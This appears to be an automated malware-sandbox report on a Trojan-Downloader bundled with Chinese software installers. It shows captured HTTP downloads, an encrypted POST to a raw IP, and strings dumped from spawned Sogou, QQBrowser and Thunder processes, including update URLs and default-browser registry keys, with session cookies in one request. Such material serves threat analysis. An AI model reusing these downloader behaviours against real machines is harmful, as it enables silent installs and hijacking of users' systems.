HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8742324-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:45 GMT
Content-Type: application/octet-stream
Content-Length: 2967204
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8742324-11709527/11709528
w........mQ..R.....Hvg....|G..Z........]M...K.H...8O".....zS&.s....<
;.V..}...9L...G{[email protected]>.......i....~e......Y...K.....].[2.{ $C
c. W...D...z...c!.0-P..l..(.....INJ. 0.......'......s..}<....z9....
.}T.cS.s>...y>e....!.......M..N..gp......aP..e.~.3. R..JK..gHA.$
.*..l.$...h...s..{.h.........~....<../.fr...V............}[.5. .$;.
.c.............=q.D .Sk(...{...iTGUZ.x..........anT.=..:.w..1..^|.....
..\..f........I.....0../.(..........ral>.....5..`W.B.......K...t...
-G...e..r. .j.7.l}...E..<#0.CX......{''S..uP.....S.F.i..;...=c[,.~]
..Z.i*0/w..TJ....P.<"D=......5d..;..s>!^..X}M..<,qLS.......].
y}..P.\....=..\..%.`K. K.."P;B. ....Z..D.=....o....^....H....k]......?
7...$.J...n".-..b[W... .{7}Xf#../....W..b.Z.wD..*.Ru..t|....v.dR....q.
..t....j.&............8~[mI.......C!.Q.@...)2IZ?..|...{.D ..../o...d1}
[email protected]..:.xX...y..=..
..d...K}.......5.I..=8W..l9Gi...q..#.".*e.e.f\P8.j..s1T......O.Az.....
y.m2..]..q.A.......]..#._&z{.sCj....\$jzBx-........iu...@c-!Y......5_.
.T..W..........\....A....Oh.?<. .S^....z.. .;..Y.<.5GpH.wB....d$
...QQ.......ND.........m*N..v.'(..F.m.%k..x.kL.).........C?@AT\u?J...1
rt.TtUH.}....4#........s%....1 R..~....Qq..\.?8A..A...b.&.;.a.S~P3..2.
/.W..C.(...J.;p..EJ..bD......yN..%.j...epz.....K})...f*......u..h.....
y....R..7f......%W[>.z.V\...9..yF..J..mW..t.....O.".&O.p..qup.8.c.*
..[j..]......qG# h~.p>.D.$.K.{!xU.l.Wyt....U...w'......,.X^fBY....H
Z.'\....R...aA......HBN.....A..6."...]q>...m....>.3.VUB...WF
<<< skipped >>>


GET /pc_logo/7638937123950702413.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:08 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD>.<ME
TA HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312"> .
<TITLE>......................URL..........</TITLE>.<STY
LE type="text/css"><!--BODY{background-color:#ffffff;font-family
:verdana,sans-serif}PRE{font-family:sans-serif}--></STYLE>.&l
t;/HEAD><BODY>.<H1>....</H1>.<H2>..........
......URL..........</H2>.<HR noshade size="1px">.<P>
.......................URL.......<A HREF="hXXp://dl.app.sogou.com/p
c_logo/7638937123950702413.png">hXXp://dl.app.sogou.com/pc_logo/763
8937123950702413.png</A>.<P>....................<UL>
.<LI>.<STRONG>.Unable to forward this request at this time
..<BR>................................</STRONG>.</UL>
;..<P>.This request could not be forwarded to the origin server 
or to any.parent caches.  The most likely cause for this error is that
:.<UL>.<LI>The cache administrator does not allow this cac
he to make .    direct connections to origin servers, and.<LI>Al
l configured parent caches are currently unreachable..</UL>.<
/P>.<P>......................................................
..................................<UL>.<LI>...............
............................................<LI>................
.................................</UL>.</P>.<P>.
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2927382-5854763
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:12:56 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



POST / HTTP/1.1
Host: 123.129.242.139:80
Content-type: application/octet-stream
Content-Length: 316
Connection: Keep-Alive

<.......0....V.....z..9V..n..C(.k.&vK..2S}M.1..f.x.._b...... $.....m..K.[...e........~.;...U.........q...g.aO6...Xvy....._.d...]~.n.(...].I..$f.Fo.~ ...\*......".../X....8......b.w.L>8...].m..g.w=...M..u..|......e........%'aw.*
.c#?.^U.>.y.
.....J.:i..p#.B..s'?.A.6yk.$.h5wM..g...$..;Nv&BS....Evc......Y!HF.~(..i.
HTTP/1.1 200 OK
Content-Length: 1644
Content-Type: application/octet-stream
Connection: Close
<.......`.......8...c.)#. 3..H_....][email protected].[K....P.g#]..%[.
...... ...ZNu....8o..c.H2.>...[.."...N#.../.)./..a...P. o...v|.....
b....:.C.......=U.g...b.. [email protected].#...x*5nI..ds..%`...3G
..........^..O.... }........G..k.,.5........ G`o..:...W.....kFc....xrQ
[.`.........u.....!.*.|.RA....p.x.!5..!..=..L...{.....1../G.R. b.ka...
fDw._"%.....l...Ld......j......1.zL.5...s.......hv..U..(....nO..F..PT.
..rL*...x..r...rEV.G .[.......JSm9u..e.xK...bm...Gn;K.J.^.......*V[..f
i8...9....d.....2.v28.:....0z.O.24}.].0....Aw..z".4..<.1..gu...a...
46~.mb.=..oo{......_C..-<A..g..&.......*H...G...X^.g!.I~......wZ..b
...|.N..)....q.*.R....V...k.Z_.......L.2[,......= o.]..b..._Er....JC$=
7.SYZ%.2V2.1u.p>.....k.....):9.FV..#G.'...&..R.../...k.$...M..D..~.
.a.....|.......w.w.D.a..;..\..";%L.#.}....#[email protected]...=..d.#.wEI..SQ.
9.O.U..P......../@.TN.x.y.."uG^..b.....2F.zX.=0;.*..r.; Y..V.........t
....5...T{{..QM/...\.....H. ...B.J2em.........|'-j/.&:..?.X.,.....ml.0
J..j..G.....D...%`.....Xl..].......j....i.u..e}I.s0......q..HK.....|. 
."..=.&..6K....1....L.1T.x$.`.% .....s#....D...K.!l...OaM.1..t.Q.s]$..
Z..4..\_.p.5.].h..[.|/.r....%Z.............,.g......._Z...J......?t.X.
.C.....8...IW.Z....(%.wZZ..).k.i'.x.?.d.......%....g`.K>....h....O.
x....U../...7.|.........UZS>9...i.l'..%O....c...$ .].k.m....o......
.|.w..o...V=....Z^..nY.)N.(7..1.b..~FG......~9s.....!......./.1|Q.k>
;.....k../[.%9t.;...[.:.o..;|..e.mD..^q...2..g..b.5j..M.%."t.......81q
]...RA.M..\.c...!C..M..... .s...?.*..V.........{.B.;$.......%....s
<<< skipped >>>






The Trojan-Downloader connects to the servers at the folowing location(s):







SogouSoftware.exe_216:




.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessHeap
KERNEL32.dll
F:\SogouSoftwareWorkDir\SogouSoftware\Src\Launcher\Release\Launcher.pdb
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
manifest.cfg
SogouSoftware.dll
SogouSoftwareLoader.dll
0.0.0.1
Sogou.com Inc.
3.1.12.94
Launcher.exe
2014 Sogou.com Inc. All rights reserved.

wuauclt.exe_1792:




.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
zcÁ
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
%WinDir%
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System

UpdateService.exe_1880:




.text
`.rdata
@.data
.rsrc
PSSSSSSh
PSSSSSSh!
8-H6}G6)67Z
JPi.lP
SHELL32.dll
USERENV.dll
KERNEL32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHDeleteKeyA
SHLWAPI.dll
VERSION.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WTSAPI32.dll
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetProcessHeap
RegOpenKeyExW
RegOpenKeyA
RegSetKeySecurity
RegCreateKeyA
RegCreateKeyExA
USBDT.dll
[%s Update Service]register success.
"%s" /Service
UpdateService.exe
[%s Update Service]register fail 3.
[%s Update Service]register fail 2.
[%s Update Service]register fail 1.
SogouSoftware_Mutex_{4A79E46E-5A01-4abb-BCC1-F96D06AEE085}
[%s Update Service]start register.
"%s" /Restart
[%s Update Service]wait %d minutes.
SogouSoftware.exe
SogouSoftware.exe /AutoRun
[%s Update Service]start service.
NUL=%s
wininit.ini
%s\Temp\
%s=%s
EXPLORER.EXE
IEXPLORE.EXE
%d%c%d
AllocateAndInitializeSid error %u
"%s" %s
Dbghelp.dll
Kernel32.dll
user32.dll
hXXp://ping.t.sogou.com/pingd?srctype=sogousoftware&t=%d&gid=%s&unc=%s&%s&rand=%d
serviceversion=%s
hXXp://ping.t.sogou.com/pingd?srctype=sogousoftware&t=%d&gid=%s&unc=%s&rand=%d
hXXp://t.sogou.com/update_platform/done.php?v=%s&appname=sogousoftware_update&state=1
Mddddd
%d.%d.%d.%d
%s_Classes\%s\%s
%s\%s
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%s_Classes\%s
http\shell\open\command
explorer.exe
%%X
%%x
err 02: %d
err 01: %d
1.0.0.0
CommonState.dll
Wininet.dll
UrlMon.dll
SGGuiFoundation{46558918-2F85-46DA-9639-1941E6282A1D}
[UpateDir:%s].
[%s Update Service]start update.
Setup.exe
[%s Update Service]update success.
[%s Update Service]new version: %s, local version: %s.
%s\%s%s
Profile.ini
hXXp://t.sogou.com/update_platform/update.php?appname=sogousoftware_update&unc=%s&guid=%s&useridbit1=%s&useridbit2=%s&v=%s&t=%d
[m_szLocalProfile:%s].
HotPatch.exe
Userenv.dll
iexplore.exe
\StringFileInfo\xx\%s
Update.ini
file%d
%s PID=%d
.bak.exe
wintrust.dll
2.5.4.3
CertCloseStore
CryptMsgClose
CertFreeCertificateContext
CertFindRDNAttr
CertRDNValueToStrA
CertCreateCertificateContext
CryptMsgGetParam
crypt32.dll
1.2.840.113549.1.9.5
CryptDecodeObject failed with %x
1.2.840.113549.1.9.6
rundll32.exe
%s,Rundll32
%s,Rundll32 E
%s,Rundll32 I
%s,Rundll32 R
Rundll32.exe %s,Rundll32 R
CLSID\%s\InprocServer32
CLSID\%s
SogouSoftware.dll
manifest.cfg
S%c%cR
%s*.sys
ATßT%d%d.dat
FT%uD
FT%uH
AT%uFT%u
%Program Files%\TENCENT\SSPlus\SData.dat
PendingFileRenameOperations
advapi32.dll
Sogou.com Inc.
3.1.13.79
(C) 2015 Sogou.com Inc. All rights reserved.

MiniThunderPlatform.exe_2060:




.textbss1U
.text
`.rdata
@.data
.idata
.rsrc
httpsProxy
ftpProxy
httpProxy
dwTcpSpeedLimit
ref_url_length
ref_url
url_length
udp_port
tcp_port
strCurrentExeFullPath
strExeFullPath
bug_report_dir
ShExecInfo
cmd_line
hKey
CertInfo
hMsg
XLBugReport_path
SSSh5
hXXp://store.paycenter.uc.cn
mail-attachment.googleusercontent.com
d:\minitp\src\minithunderplatform\src\minithunderplatform\downloadenginemanager.cpp
80000055
\/:*?"<>|
d:\minitp\src\minithunderplatform\src\dl_common\common\utility.cpp
_XL_SetAlwaysSendReport@4
_XL_SetReportShowMode@4
_XL_SetBugReportRootDir@4
unknown SDParameterType: %d when SDParameter::encode_data
unknown SDParameterType: %d when SDParameter::decode_data
Kernel32.dll
Run-Time Check Failure #%d - %s
MSPDB71.DLL
PSAPI.DLL
IMAGEHLP.DLL
KERNEL32.DLL
RegCloseKey
RegOpenKeyExA
ADVAPI32.DLL
d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb
||80000372
VERSION.dll
RASAPI32.dll
KERNEL32.dll
USER32.dll
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCP71.dll
SHLWAPI.dll
MSVCR71.dll
_CRT_RTC_INIT
_wcmdln
_amsg_exit
CryptMsgClose
CertCloseStore
CertFreeCertificateContext
CertGetNameStringW
CertFindCertificateInStore
CryptMsgGetParam
CRYPT32.dll
GetProcessHeap
id.dat
dl_peer_id.dll
dc.ini
download_engine.dll
MINITP\BugReport\
{C6B7F4D9-8D15-4a48-A722-B54C3D6FCE70}
_67960FC3-A819-4fca-B939-F2B110716584_
{16C9DF46-AAF4-485d-AABE-4FE09E17E524}
%s=%s
%hu%c%hu%c%hu%c%hu
http redirect loop for 5 times
http redirect url is invalid
http header is invalid
xml <item> no key
invalid rsa public key
invalid aes key
shell32.dll
\*.dll
XLBugReport.exe
XLBugHandler.dll
%sThumbs.db
Thumbs.db
%s*.*
3.2.1.42

WiFi-2175.exe_664:




.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
387KRO]X[].IQKS@83-(==0
183KRO[X[_.BKHKB83.&-1(
.OWOOOOOOOOOMFOOH8@HHBJS]hKOWSHBPVXSXWSXSXXWH.
*'-842.*'#
"*8=?6.'
$5<::::.
.png" hotimage="
.png" pushedimage="
.png"/>
.png" />
.png" disabledimage="
.png"/>-->
.png" selected="true" selectedimage="
.png" userdata="28"/>
.png" userdata="29"/>
.png" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" foreimage="
.png" min="0" max="30000" value="50" hor="true" isstretchfore="false" />
<VerticalLayout width="587" height="437" bkimage="bg1.png">
<VerticalLayout width="587" height="437" bkimage="bg1.png">
<Button name="CancelBtn4UninstallPage" float="true" pos="477,387,0,0" width="90" height="30" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" normalimage="btn1.png" hotimage="btn2.png" pushedimage="btn2.png" />
<Button name="btn7" float="true" pos="42,387,0,0" width="24" height="25" bkimage="icon.png" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" />
.png" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" />
<VerticalLayout width="587" height="437" bkimage="bg2.png">
.png" group="Radio" selectedimage="
.png" userdata="34"/>
<VerticalLayout width="587" height="437" bkimage="bg3.png" >
.png" />-->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nss8.tmp\SetupPlugin.dll
tallPackages.xml
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss8.tmp\SetupPlugin.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss8.tmp
Nullsoft Install System v2.46.5-Unicode
nss8.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk7.tmp
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk7.tmp
C:\SogouDownload\
"C:\SogouDownload\WiFi-2175.exe"
%Program Files%\WiFi
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\WiFiMasterSetup\res
C:\SogouDownload
WiFi-2175.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\SogouDownload\WiFi-2175.exe
67765467
2.1.7.5

QQBrowser.exe_2624:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
HtdHtHHHt.HH
j.Yf;
_tcPVj@
.PjRW
d:\rdm\projects\7075\chrome\src\chrome\app\chrome_exe_main_win.cc
d:\rdm\projects\7075\chrome\src\chrome\app\client_util.cc
ChromeMain
-delay.dll
1.3.21.115
Chrome
0.0.0.0-devel
font_key_name
url-chunk
subresource_url
%s-%x
CHROME_PROBED_PROGRAM_FILES_PATH
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
d:\rdm\projects\7075\chrome\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_command.cc
kernel32.dll
d:\rdm\projects\7075\chrome\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
CHROME_BREAKPAD_PIPE_NAME
d:\rdm\projects\7075\chrome\src\components\crash\content\app\breakpad_win.cc
NTDLL.DLL
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
RtlReportException
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
RPlatformFile.UnknownErrors.Windows
user32.dll
.syzygy
.thunks
full-memory-crash-report
D:\rdm\projects\7075\out\Release\initialexe\qqbrowser.exe.pdb
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
qqbrowser.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
ZombieReport
SignalChromeElf
chrome_elf.dll
WINMM.dll
VERSION.dll
PSAPI.DLL
SHLWAPI.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
zcÁ
.DRNO
%uGK*
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="9.3.7078.400" version="9.3.7078.400" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
2 2$2(2,20242
6 6$6(6,6
= =@=`=|=
eTencent.QQBrowser.Default
shell32.dll
FQQBrowser.exe
QQBrowser_IE.exe
QQBrowser_Edge.exe
QQBrowser_Blink.exe
QQBrowser_Broker.exe
D%d.%d.%d.%d
Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
QBSafe.dll
\QBSafe.dll
F1Frame.dll
.F1Assistant.dll
.Downloader.dll
chrome_watcher.dll
chrome.dll
chrome_child.dll
chrome.exe
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
-chrome
-chromeframe
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
ntdll.dll
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
InnerDoBugReport
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
problem-url
kernelBase.dll
Ndebug.log
\StringFileInfo\xx\%ls
advapi32.dll
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe
9.3.7078.400
QQBrowser_exe
QQBrowser.exe

TsService.exe_3568:




.text
`.rdata
@.data
.shared
.rsrc
@.reloc
w%s( 
SSSShx "
j.Yf;
_tcPVj@
.PjRW
r%f;M
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
'2, / 0&7!4-)1#
;3 #>6.&
1.2.3
Unsupported encoding. JSON must be UTF-8.
Dictionary keys must be quoted.
\uX
UrlMkGetSessionOption
UrlMkSetSessionOption
URLDownloadToCacheFileW
CreateURLMoniker
DeleteUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExW
HttpSendRequestW
InternetCrackUrlA
InternetCrackUrlW
FindFirstUrlCacheEntryA
HttpOpenRequestW
InternetOpenUrlW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoA
255.255.255.255
CryptMsgGetParam
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CryptMsgClose
CertGetNameStringW
:/\?*<>|"
NtQueryKey
RegOpenKeyTransactedW
RegCreateKeyTransactedW
QQ Data Report
invalid string size, tag: %d, size: %u
RtlReportException
buffer overflow when peekBuf, over %u.
QB.CloudCtrlReq
QB.CloudCtrlRsp
QB.StatusInfo
QB.StatusRsp
4C5C58D1-72B2-41dc-8CC2-21C629769DBF
UniAttribute type match fail,key:
UniAttribute not found key:
invalid map, tag: %d, size: %d
read 'map' type mismatch, tag: %d, get type: %d.
require field not exist, tag: %d
read 'Char' type mismatch, tag: %d, get type: %d.
require field not exist, tag: %d.
read 'Short' type mismatch, tag: %d, get type: %d.
read 'Int32' type mismatch, tag: %d, get type: %d.
invalid string size, tag: %d, size: %d
read 'string' type mismatch, tag: %d, get type: %d.
skipField with invalid type, type value: %d, %d.
skipField with invalid type, type value:%d.
read 'struct' type mismatch, tag: %d, get type: %d.
type mismatch, tag: %d, type: %d, %d
invalid size, tag: %d, type: %d, %d, size: %d
invalid size, tag: %d, type: %d, size: %d
type mismatch, tag: %d, type: %d
read 'vector' type mismatch, tag: %d, get type: %d.
MTT.LoginReq
MTT.LoginRsp
login
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
RegOpenKeyExA
{160DC878-B36C-403E-B113-4C12CEFC8254}
{9B215FD8-A8C2-4F2C-9A8A-E8C18E426EB6}
{A09B1895-6837-45BC-B687-9DCDAAF5E792}
{BBE2A5F9-A110-4EAC-A0C9-6076FA30317A}
{C4F7CB98-9208-4E5C-A060-79218688C40C}
{4391DEF3-9555-4CAE-BBDA-0DF1B29A0589}
{22B39820-CD73-4AA5-89C6-A2813A54B1BD}
